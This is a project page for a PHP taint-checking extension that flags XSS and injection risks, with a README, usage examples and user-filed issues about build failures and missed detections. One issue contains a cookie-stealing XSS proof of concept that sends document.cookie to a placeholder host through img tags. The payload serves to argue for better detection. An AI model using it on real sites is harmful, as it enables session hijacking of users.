laruence / taint Goto Github PK

Taint is a PHP extension, used for detecting XSS codes

License: Other

PHP 18.08% Shell 0.05% C 81.41% M4 0.27% JavaScript 0.19%

taint c detect-xss-codes php

taint's Introduction

Taint

php extension used to detect XSS codes(tainted string), And also can be used to spot sql injection vulnerabilities, shell inject, etc.

The idea is from https://wiki.php.net/rfc/taint, I implemented it in a php extension which make the patch no-needed.

Please note that do not enable this extension in product env, since it will slowdown your app.

Requirement

PHP-5.2 +

NOTE

Due to complication of PHP8.0 implementation, taint is not going to be compatible with PHP8.0+.

Install

taint is an PECL extension, thus you can simply install it by:

pecl install taint

Compile taint in Linux

$/path/to/phpize
$./configure --with-php-config=/path/to/php-config/
$make && make install

Usage

When taint is enabled, if you pass a tainted string(comes from $_GET, $_POST or $_COOKIE) to some functions, taint will warn you about that.

<?php
$a = trim($_GET['a']);

$file_name = '/tmp' .  $a;
$output    = "Welcome, {$a} !!!";
$var       = "output";
$sql       = "Select *  from " . $a;
$sql      .= "ooxx";

echo $output;

print $$var;

include($file_name);

mysql_query($sql);

The above example will output something similar to:

Warning: main() [function.echo]: Attempt to echo a string that might be tainted

Warning: main() [function.echo]: Attempt to print a string that might be tainted

Warning: include() [function.include]: File path contains data that might be tainted

Warning: mysql_query() [function.mysql-query]: SQL statement contains data that might be tainted

If you need to hide the errors for a particular script, you can:

ini_set('taint.error_level', 0);

taint's People

Contributors

Stargazers

Watchers

Forkers

fangfang xzpeng enimo lebinhe moon2l phonpeng zxcvdavid nigelbaor topcaver woerwin loveshell neeke ghostx2013 byphper imarlboro sumiaowen zhangkg vicenteforever n0way jimmyjzhang stamhe gaecom eguaj bear1101 jinglingshu georgeargyros pythias mrzeta skylei gxhua cnbird1999 xianlimei silenceper dj31416 cofyc usingtcnower yinyue 9618211 duke-cheng lcbyz odin1314 huodi tempbottle kate63663 atlasian cxw0504 jv-bugmaker remicollet sunnyzwh yangbaopeng gangjun911 cashwilliams pythonlearner7 lcx517 mzcaptainyang hu19891110 tutorial0 retanoj safe3 wucaishi hongweishang franktom93 ismilent jihanzhuang sukwon0709 kalsolio nonenotnull craigfrancis staabm zyx-vec 623665910 jingqiangliu domyhero jinyu00 dungenessbin andrewddc jan-e zekang xbeark raul1718 gongchengcheng 0irebrwe wettper wxyzz gcxtx traceur fzxcp3 cyskzl tcsecchen peaklee wl6179 kissthink xianqiangzhao l3m0n james-ren iicoming myndtt safly dujuwen jovrer

taint's Issues

编译的warning

Hi，鸟哥，

编译taint的时候有个warning，貌似zend_get_parameters_ex()已经是ZEND_ATTRIBUTE_DEPRECATED了，能否改成zend_parse_parameters呢

    zval **arg;
    int tainted = 0;

  if (ZEND_NUM_ARGS() != 1 || zend_get_parameters_ex(1, &arg) == FAILURE) {

  if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "r", arg) == FAILURE) {
        WRONG_PARAM_COUNT;
}

header() emits a warning, but there isnt a clear untaint function for this case

since 4fdfb3e the header() function also warns against tainted strings - which is great.

when looking thru the list of functions[1] which drop the taint-mark, there isnt a candidate which fits for escaping before passing a string into header().

how to handle this case?

[1] http://php.net/manual/en/taint.detail.untaint.php

taint-2.0.3不支持php.7.0.0

编译时报下面错误
./php_taint.h:60:3: error: "Unsupported PHP Version ID:" PHP_VERSION_ID

error "Unsupported PHP Version ID:" PHP_VERSION_ID

我的php版本
PHP 7.0.0 (cli) (built: Dec 10 2015 14:13:08) ( NTS ) Copyright (c) 1997-2015 The PHP Group Zend Engine v3.0.0, Copyright (c) 1998-2015 Zend Technologies with Zend OPcache v7.0.6-dev, Copyright (c) 1999-2015, by Zend Technologies with Xdebug v2.4.0RC4-dev, Copyright (c) 2002-2015, by Derick Rethans

查看源码./php_taint.h:60:3有这么一段

#if PHP_VERSION_ID > 70000
# if PHP_VERSION_ID >= 70200
# undef IS_STR_TAINT_POSSIBLE
/* Coflicts with GC_COLLECTABLE which is introduced in 7.2 */
# define IS_STR_TAINT_POSSIBLE (1<<6)
# endif
#else
# error "Unsupported PHP Version ID:" PHP_VERSION_ID
#endif

要支持php7.0.0，需要改成下面这样。
#if PHP_VERSION_ID >= 70000

PHP Startup: taint: Unable to initialize module （PHP5.4）

鸟哥，报错了
版本：
PHP 5.4.27 (cli) (built: Apr 9 2014 13:17:08)
Linux star-virtual-machine 3.2.0-64-generic-pae #97-Ubuntu SMP Wed Jun 4 22:22:15 UTC 2014 i686 i686 i386 GNU/Linux

Warning: PHP Startup: taint: Unable to initialize module
Module compiled with module API=20090626
PHP compiled with module API=20100525
These options need to match
in Unknown on line 0

Add a function to check if a variable is made from string constants

Having tried the taint extension for a while, I find that it does a good job at identifying most issues, while only requiring minor tweaks to my code to avoid warnings.

However there are a few exceptions which can't be covered with the current implementation, for example mysqli_real_escape_string() without quote marks (see pg_escape_literal for comparison), or using preg_replace to sanitise a string.

So taking the idea from Matt Tait - https://wiki.php.net/rfc/sql_injection_protection

Would it be possible to keep the current implementation, but add a second flag that tracks if a variable has only been built from T_STRING constants?

Then add a new function that allows the programmer to check the variable is made from string constants, maybe with a function named is_string_constant, or is_static, etc.

This means the following could be possible to check for SQLi:

<?php

	class db {
		function fetch_row($sql, $parameters) {
			if (!is_string_constant($sql)) {
				throw new Exception('Not a static string.');
			}
			// ...
		}
		// ...
	}

?>
<?php

	define('SQL_TABLE_PREFIX', 'abc_');

	if ($_GET['order'] == 'desc') {
		$sql_order = 'DESC';
	} else {
		$sql_order = 'ASC';
	}

	$sql = 'SELECT
			*
		FROM
			' . SQL_TABLE_PREFIX . 'table
		WHERE
			field = ?
		ORDER BY
			field ' . $sql_order;
			
	$parameters = array();
	$parameters[] = array('s', $unsafe_var);

	if ($row = $db->fetch_row($sql, $parameters)) {
		// It works :-)
	}

?>

And likewise, a framework could provide a wrapper to exec/shell_exec/system/passthru which supports a form of parameterized command, while checking that the command itself if made from string constants.

php version 5.3.3 问题

环境：php version 5.3.3

PECL下载版本1.2.2 出现 Issue #6 问题，而后直接从github下载make出错

[tangyi@jiajutest php-taint]$ sudo make && makeinstall
[sudo] password for tangyi:
/bin/sh /home/tangyi/src/php-taint/libtool --mode=compile cc  -I. -I/home/tangyi/src/php-taint -DPHP_ATOM_INC -I/home/tangyi/src/php-taint/include -I/home/tangyi/src/php-taint/main -I/home/tangyi/src/php-taint -I/usr/local//include/php -I/usr/local//include/php/main -I/usr/local//include/php/TSRM -I/usr/local//include/php/Zend -I/usr/local//include/php/ext -I/usr/local//include/php/ext/date/lib  -DHAVE_CONFIG_H  -g -O2   -c /home/tangyi/src/php-taint/taint.c -o taint.lo
 cc -I. -I/home/tangyi/src/php-taint -DPHP_ATOM_INC -I/home/tangyi/src/php-taint/include -I/home/tangyi/src/php-taint/main -I/home/tangyi/src/php-taint -I/usr/local//include/php -I/usr/local//include/php/main -I/usr/local//include/php/TSRM -I/usr/local//include/php/Zend -I/usr/local//include/php/ext -I/usr/local//include/php/ext/date/lib -DHAVE_CONFIG_H -g -O2 -c /home/tangyi/src/php-taint/taint.c  -fPIC -DPIC -o .libs/taint.o
/home/tangyi/src/php-taint/taint.c: In function ‘php_taint_fetch_dimension_address’:
/home/tangyi/src/php-taint/taint.c:892: error: ‘zval’ has no member named ‘refcount’
/home/tangyi/src/php-taint/taint.c:892: error: ‘zval’ has no member named ‘is_ref’
/home/tangyi/src/php-taint/taint.c: In function ‘php_taint_binary_assign_op_obj_helper’:
/home/tangyi/src/php-taint/taint.c:1057: error: ‘zval’ has no member named ‘refcount’
/home/tangyi/src/php-taint/taint.c:1057: error: ‘zval’ has no member named ‘is_ref’
/home/tangyi/src/php-taint/taint.c: In function ‘zif_taint_strval’:
/home/tangyi/src/php-taint/taint.c:2248: warning: ‘zend_get_parameters_ex’ is deprecated (declared at /usr/local//include/php/Zend/zend_API.h:224)
make: *** [taint.lo] Error 1

json_encode is not safe to xss

http://stackoverflow.com/questions/5913503/xss-creating-a-javascript-object-using-phps-json-encode/40230653#40230653

A poc to steal cookie:

$xss=<<<EOL
<img id='id' src='http://balabla.com/xss.php?'>
<img src=# onerror=document.getElementById('id').src+=document.cookie>
EOL;
$arr['xss']=$xss;
echo json_encode($arr);

Actually json_encode is widly used to escape js.
I suggest add json_encode to http://php.net/manual/en/taint.detail.basic.php

pecl install doesnt work on 7.x

any chanche you could upload one of the recent 7.x compatible releases to pecl.php.net so we can easily install them via CLI and pecl command?

mstaab@mst16:/$ php -v
PHP 7.0.14-2+deb.sury.org~xenial+1 (cli) ( NTS )
Copyright (c) 1997-2016 The PHP Group
Zend Engine v3.0.0, Copyright (c) 1998-2016 Zend Technologies
    with Zend OPcache v7.0.14-2+deb.sury.org~xenial+1, Copyright (c) 1999-2016, by Zend Technologies
    with Xdebug v2.5.0, Copyright (c) 2002-2016, by Derick Rethans
    with blackfire v1.14.1~linux-x64-non_zts70, https://blackfire.io, by Blackfireio Inc.

mstaab@mst16:/$ sudo pecl install taint
pecl/taint requires PHP (version >= 5.2.0, version <= 5.4.99), installed version is 7.0.14-2+deb.sury.org~xenial+1
No valid packages found
install failed

function.echo

鸟哥 echo 官网都说不是一个函数而是一个语言结构，为什么还要在输出的信息中表示这是一个function呢？

echo 不是一个函数（它是一个语言结构）

首页的介绍中提到的echo ：

Warning: main() [function.echo]: Attempt to echo a string that might be tainted

字符串连接后无法触发taint

发现了一个问题，像这样调用时不会触发taint：

$var = $_GET['var'];
$var1 = $var . 'string';
echo $var1;

不知能否解决。

call_user_func() loses taint

Using call_user_func() and call_user_func_array() causes lose of taint value.

Example code:

<?php

$input = $_GET['in'];
$function = 'render';
// Send tainted variable to $function
$output = call_user_func($function, $input);

function render($input) {
  // $input is tainted
  if (is_tainted($input)) {
    print "Input is tainted<br>";
  }
  return $input;
}

// $output is tainted
if (is_tainted($output)) {
  print "Output is tainted<br>";
}

Output:

Input is tainted

copy of tainted variable makes original variable forget it was a reference

Copying a function variable makes it forget that is was a reference. This is with php 5.3.10 (latest in ubuntu precise).

Demo-code:

<?php

header('Content-Type: text/plain');

$string = '[email protected]';

echo "input: ".$string."\n";
echo "expected result: @bar.com\n-----\n\n";

taint($string);
checkEmailAddress($string);

untaint($string);
checkEmailAddress($string);

function checkEmailAddress($address) {

        if ( is_tainted($address) ) {
                echo "with tainted variable:\n";
        } else {
                echo "with normal variable:\n";
        }

        $ret = getAddressSpec($address);

        echo "RESULT: ";
        var_dump($address);
        echo "\n\n";
}

function getAddressSpec(&$at) {

        echo "BEFORE CHANGE: ";
        var_dump($at);

        // This line is the problem. It works for tainted variables if we remove it.
        $oldat = $at;

        // Change contents of reference
        $at = '@bar.com';

        echo "AFTER CHANGE IN SAME FUNCTION: ";
        var_dump($at);
}
?>

You'll see that the result of checkEmailAddress changes if we change the 'taintedness' of the variable given to the function.

Output for 5.3.10:

input: [email protected]
expected result: @bar.com
-----

with tainted variable:
BEFORE CHANGE: &string(11) "[email protected]"
AFTER CHANGE IN SAME FUNCTION: string(8) "@bar.com"
RESULT: string(11) "[email protected]"


with normal variable:
BEFORE CHANGE: string(11) "[email protected]"
AFTER CHANGE IN SAME FUNCTION: string(8) "@bar.com"
RESULT: string(8) "@bar.com"

用mysqli_query执行被taint的sql语句时，没有提示

php版本： 5.5.35 nts

sql.txt内容：
show databases

php代码：
$link = mysqli_init();
mysqli_real_connect($link, '127.0.0.1', 'root', 'root', false, 3306);
$sql = file_get_contents("d:/sql.txt");
var_dump(is_tainted($sql));
taint($sql);
var_dump(is_tainted($sql));
$result = mysqli_query($link, $sql);
print_r(mysqli_fetch_all($result));
用mysqli_query执行被taint的sql语句时，没有提示，但我把taint.c php_taint_fcall_check函数中获取参数修改成如下就可以了：
if (strncmp("mysqli_query", fname, len) == 0){
el = *((zval **)(p - (arg_count - 1)));
}else{
el = *((zval **)(p - arg_count));
}
不知道是什么原因

Compatibility with 5.5.x

Doesnt compile on 5.5.4.

/bin/sh /data/install/20130920/taint-1.2.2/libtool --mode=compile cc -I. -I/data/install/20130920/taint-1.2.2 -DPHP_ATOM_INC -I/data/install/20130920/taint-1.2.2/include -I/data/install/20130920/taint-1.2.2/main -I/data/install/20130920/taint-1.2.2 -I/data/php554/include/php -I/data/php554/include/php/main -I/data/php554/include/php/TSRM -I/data/php554/include/php/Zend -I/data/php554/include/php/ext -I/data/php554/include/php/ext/date/lib -DHAVE_CONFIG_H -g -O2 -c /data/install/20130920/taint-1.2.2/taint.c -o taint.lo
mkdir .libs
cc -I. -I/data/install/20130920/taint-1.2.2 -DPHP_ATOM_INC -I/data/install/20130920/taint-1.2.2/include -I/data/install/20130920/taint-1.2.2/main -I/data/install/20130920/taint-1.2.2 -I/data/php554/include/php -I/data/php554/include/php/main -I/data/php554/include/php/TSRM -I/data/php554/include/php/Zend -I/data/php554/include/php/ext -I/data/php554/include/php/ext/date/lib -DHAVE_CONFIG_H -g -O2 -c /data/install/20130920/taint-1.2.2/taint.c -fPIC -DPIC -o .libs/taint.o
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_get_zval_ptr_cv’:
/data/install/20130920/taint-1.2.2/taint.c:388:17: error: ‘struct _zend_execute_data’ has no member named ‘CVs’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_get_zval_ptr_ptr_cv’:
/data/install/20130920/taint-1.2.2/taint.c:417:17: error: ‘struct _zend_execute_data’ has no member named ‘CVs’
/data/install/20130920/taint-1.2.2/taint.c:437:46: error: ‘struct _zend_execute_data’ has no member named ‘CVs’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_echo_handler’:
/data/install/20130920/taint-1.2.2/taint.c:504:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:507:10: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:510:16: error: ‘struct _zend_execute_data’ has no member named ‘CVs’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_include_or_eval_handler’:
/data/install/20130920/taint-1.2.2/taint.c:541:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:544:10: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:547:16: error: ‘struct _zend_execute_data’ has no member named ‘CVs’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_concat_handler’:
/data/install/20130920/taint-1.2.2/taint.c:595:12: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:598:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:601:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:613:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:616:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_binary_assign_op_obj_helper’:
/data/install/20130920/taint-1.2.2/taint.c:980:91: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:982:19: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:986:88: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1009:82: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1012:82: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1028:2: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1066:4: warning: passing argument 3 of ‘object->value.obj.handlers->get_property_ptr_ptr’ makes integer from pointer without a cast [enabled by default]
/data/install/20130920/taint-1.2.2/taint.c:1066:4: note: expected ‘int’ but argument is of type ‘struct zend_literal _’
/data/install/20130920/taint-1.2.2/taint.c:1066:4: error: too few arguments to function ‘object->value.obj.handlers->get_property_ptr_ptr’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_binary_assign_op_helper’:
/data/install/20130920/taint-1.2.2/taint.c:1196:90: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1228:80: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1231:80: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1256:40: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1257:88: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1258:79: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1267:80: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1270:80: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1288:86: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1315:4: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1316:4: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1317:4: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1317:4: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1317:4: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1317:4: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1317:4: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1317:4: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1375:3: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1377:3: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1377:3: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1377:3: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1377:3: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1377:3: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1377:3: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_add_string_handler’:
/data/install/20130920/taint-1.2.2/taint.c:1416:12: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1430:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1433:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_add_char_handler’:
/data/install/20130920/taint-1.2.2/taint.c:1473:12: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1487:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1490:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_add_var_handler’:
/data/install/20130920/taint-1.2.2/taint.c:1532:12: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1546:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1549:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1564:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1567:77: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_do_fcall_by_name_handler’:
/data/install/20130920/taint-1.2.2/taint.c:1896:40: error: ‘zend_execute_data’ has no member named ‘fbc’
/data/install/20130920/taint-1.2.2/taint.c:1897:37: error: ‘zend_execute_data’ has no member named ‘fbc’
/data/install/20130920/taint-1.2.2/taint.c:1910:66: error: ‘zend_execute_data’ has no member named ‘fbc’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_assign_handler’:
/data/install/20130920/taint-1.2.2/taint.c:1928:10: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1932:16: error: ‘struct _zend_execute_data’ has no member named ‘CVs’
/data/install/20130920/taint-1.2.2/taint.c:1954:10: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:1958:16: error: ‘struct _zend_execute_data’ has no member named ‘CVs’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_assign_ref_handler’:
/data/install/20130920/taint-1.2.2/taint.c:2005:10: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:2009:16: error: ‘struct _zend_execute_data’ has no member named ‘CVs’
/data/install/20130920/taint-1.2.2/taint.c:2029:10: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:2033:16: error: ‘struct _zend_execute_data’ has no member named ‘CVs’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_send_ref_handler’:
/data/install/20130920/taint-1.2.2/taint.c:2068:8: error: ‘zend_execute_data’ has no member named ‘fbc’
/data/install/20130920/taint-1.2.2/taint.c:2068:8: error: ‘zend_execute_data’ has no member named ‘fbc’
/data/install/20130920/taint-1.2.2/taint.c:2068:8: error: ‘zend_execute_data’ has no member named ‘fbc’
/data/install/20130920/taint-1.2.2/taint.c:2068:8: error: ‘zend_execute_data’ has no member named ‘fbc’
/data/install/20130920/taint-1.2.2/taint.c:2068:8: error: ‘zend_execute_data’ has no member named ‘fbc’
/data/install/20130920/taint-1.2.2/taint.c:2074:10: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:2078:16: error: ‘struct _zend_execute_data’ has no member named ‘CVs’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘php_taint_send_var_handler’:
/data/install/20130920/taint-1.2.2/taint.c:2121:7: error: ‘zend_execute_data’ has no member named ‘fbc’
/data/install/20130920/taint-1.2.2/taint.c:2121:7: error: ‘zend_execute_data’ has no member named ‘fbc’
/data/install/20130920/taint-1.2.2/taint.c:2121:7: error: ‘zend_execute_data’ has no member named ‘fbc’
/data/install/20130920/taint-1.2.2/taint.c:2121:7: error: ‘zend_execute_data’ has no member named ‘fbc’
/data/install/20130920/taint-1.2.2/taint.c:2121:7: error: ‘zend_execute_data’ has no member named ‘fbc’
/data/install/20130920/taint-1.2.2/taint.c:2127:10: error: ‘zend_execute_data’ has no member named ‘Ts’
/data/install/20130920/taint-1.2.2/taint.c:2131:16: error: ‘struct zend_execute_data’ has no member named ‘CVs’
/data/install/20130920/taint-1.2.2/taint.c: In function ‘zif_taint_strval’:
/data/install/20130920/taint-1.2.2/taint.c:2248:2: warning: ‘zend_get_parameters_ex’ is deprecated (declared at /data/php554/include/php/Zend/zend_API.h:238) [-Wdeprecated-declarations]
make: ** [taint.lo] Error 1

Variable tracing changed the reference of orignal variable!

the follow is test code

test.php 
<?php
      $a = "hello";
      $id = &$a;
      $id = $_GET['id'];
      $c = $id;
      $id = "hello123";
      echo $a;
      echo $id;
?>

if you input "http://*****/test.php?id=ab" in your browser and add the taint extension, the output will be "abhello123" in your page. But it should output "hello123hello123", this changed the php internal executing.

I think that the problem is caused by php_taint_assign_handler, when you seperating variable, the reference count of op2 decremented. The php_taint_assign_ref_handler have the same way of handling.

Your code

/*the problem code*/
else if (PZVAL_IS_REF(*op2) && Z_REFCOUNT_PP(op2) > 1) {
		SEPARATE_ZVAL(op2);
		Z_STRVAL_PP(op2) = erealloc(Z_STRVAL_PP(op2), Z_STRLEN_PP(op2) + 1 + PHP_TAINT_MAGIC_LENGTH);
		PHP_TAINT_MARK(*op2, PHP_TAINT_MAGIC_POSSIBLE);
	}

@laruence

Release for php 7.3 compatibility

Hi,

I see there are commits on master for php 7.3 compatibility, but the latest released version 2.0.4 doesn't include those commits. Could you release a new version?

Throw Exceptions instead of triggering Errors/Warninings

Would be great when tain could be configured (e.g. using taint.error_level) to throw proper Exceptions instead of triggering Errors/Warnings.

That way would would have a proper backtrace and localisation of the actual errors would be way easier.

Add unserialize as possible injection entry

The unserialize function should also generate a warning when called with a tainted variable.
See https://www.owasp.org/index.php/PHP_Object_Injection

PHP 7.3.0 + Taint 2.0.5 + Arrays

Something isn't right with arrays:

<?php

$t = [];
$t['html'] = '
	<ul>';

foreach (['a', 'b', 'c'] as $area) {
	$t['html'] .= '
		<li>' . htmlentities($area) . '</li>';
}

$t['html'] .= '
	</ul>';

echo $t['html'];

?>

Produces the following output:

	<ul>
		<li>a</li>
		<li>b</li>
		<li>c</li>
		<li>

I'm not sure where the extra <li> comes from.

And while most of the time is produces the above, sometimes (often the first time the script is run after saving) it produces:

	<ul>
		<li>a</li>
		<li>b</li>
		<li>c</li></li>

I've not had it return the </ul>.

在源码安装过程中，使用php5.5.38安装的时候使用make命令进行编译过程中报错找不到zend_string

报错信息为：/opt/taint-master/taint.c:1625:2: error: unknown type name 'zend_string'
经过个人的查找资料发现zend_string应该是php7引入的zend虚拟机才出现的，不知最新的代码是否不支持php5？

Concatenating assignment operator loses taint

Running PHP 7.0.10 using the concatenating assignment operator appears to lose taint.

If I run the following script which concatenates strings normally:

<?php
error_reporting(E_ALL);
ini_set('display_errors', '1');

$a = "tainted string" . ".";
taint($a);
$b = 'some string ' . $a;

echo $b;

I get the following output as expected:

Warning: main() [echo]: Attempt to echo a string that might be tainted in /path/to/taint-test.php on line 9

Call Stack:
    0.0001     356120   1. {main}() /path/to/taint-test.php:0

some string tainted string.

However, if I instead use the concatenating assignment operator in the following script:

<?php
error_reporting(E_ALL);
ini_set('display_errors', '1');

$a = "tainted string" . ".";
taint($a);
$b = 'some string ';
$b .= $a;

echo $b;

The output is simply some string tainted string. and no warning is raised.

如果能日志文件记录就更好了

这样对已经部署到生产环境的老系统，只开启日志文件记录，可以更真实、全面的记录下隐患

实例化一个未定义构造函数的类时，如果传了不必要的参数，会发生 Segmentation fault (core dumped)

class Demo {}
new Demo(123);

Expanding list of functions that spread the tainted mark

https://bugs.php.net/bug.php?id=74066

I've only just stated using the extension, but I'd have thought that the following would have raised warnings.

Test script:

<?php

$tainted = '1-Evil';
taint($tainted);

preg_match('/^1-(.*)/', $tainted, $matches);

echo $matches[1] . "\n";
echo str_ireplace('1-', '2-', $tainted) . "\n";
echo preg_replace('/^1-/', '2-', $tainted) . "\n";

?>

Expected result:

Warning: main() [echo]: Attempt to echo a string that might be tainted in ./index.php on line 8
1-Evil
Warning: main() [echo]: Attempt to echo a string that might be tainted in ./index.php on line 9
2-Evil
Warning: main() [echo]: Attempt to echo a string that might be tainted in ./index.php on line 10
2-Evil

Actual result:

Evil
2-Evil
2-Evil

The php7 branch fails with VC14 x86 NTS

@laruence

C:\php-sdk\php70dev>nmake php_taint.dll

Microsoft (R) Program Maintenance Utility Version 14.00.23026.0
Copyright (C) Microsoft Corporation.  All rights reserved.

        "cl.exe" /D COMPILE_DL_TAINT /D TAINT_EXPORTS=1 /nologo /I . /I main /I Zend /I TSR
M /I ext /D _WINDOWS /D ZEND_WIN32=1 /D PHP_WIN32=1 /D WIN32 /D _MBCS /W3 /FD /wd4996 /D_US
E_32BIT_TIME_T=1 /guard:cf /MP /Zi /LD /MD /W3 /Ox /D NDebug /D NDEBUG /D ZEND_WIN32_FORCE_
INLINE /GF /D ZEND_DEBUG=0 /I "C:\php-sdk\win32build\include" /D FD_SETSIZE=256 /I "..\zlib
" /FoC:\php-sdk\php70dev\Release\ext\taint\ /FpC:\php-sdk\php70dev\Release\ext\taint\ /FRC:
\php-sdk\php70dev\Release\ext\taint\ /FdC:\php-sdk\php70dev\Release\ext\taint\ /c ext\taint
\taint.c
taint.c
ext\taint\taint.c(289): warning C4018: '<=': signed/unsigned mismatch
ext\taint\taint.c(299): warning C4018: '<=': signed/unsigned mismatch
ext\taint\taint.c(801): error C2440: 'function': cannot convert from 'int (__cdecl *)(zval
*,zval *,zval *)' to 'binary_op_type'
ext\taint\taint.c(801): warning C4024: 'php_taint_assign_op_overloaded_property': different
 types for formal and actual parameter 5
ext\taint\taint.c(842): error C2440: 'function': cannot convert from 'int (__cdecl *)(zval
*,zval *,zval *)' to 'binary_op_type'
ext\taint\taint.c(842): warning C4024: 'php_taint_binary_assign_op_obj_dim': different type
s for formal and actual parameter 5
ext\taint\taint.c(915): error C2440: 'function': cannot convert from 'int (__vectorcall *)(
zval *,zval *,zval *)' to 'int (__cdecl *)(zval *,zval *,zval *)'
ext\taint\taint.c(915): warning C4024: 'php_taint_binary_assign_op_helper': different types
 for formal and actual parameter 1
ext\taint\taint.c(917): error C2440: 'function': cannot convert from 'int (__vectorcall *)(
zval *,zval *,zval *)' to 'int (__cdecl *)(zval *,zval *,zval *)'
ext\taint\taint.c(917): warning C4024: 'php_taint_binary_assign_op_dim_helper': different t
ypes for formal and actual parameter 1
ext\taint\taint.c(919): error C2440: 'function': cannot convert from 'int (__vectorcall *)(
zval *,zval *,zval *)' to 'int (__cdecl *)(zval *,zval *,zval *)'
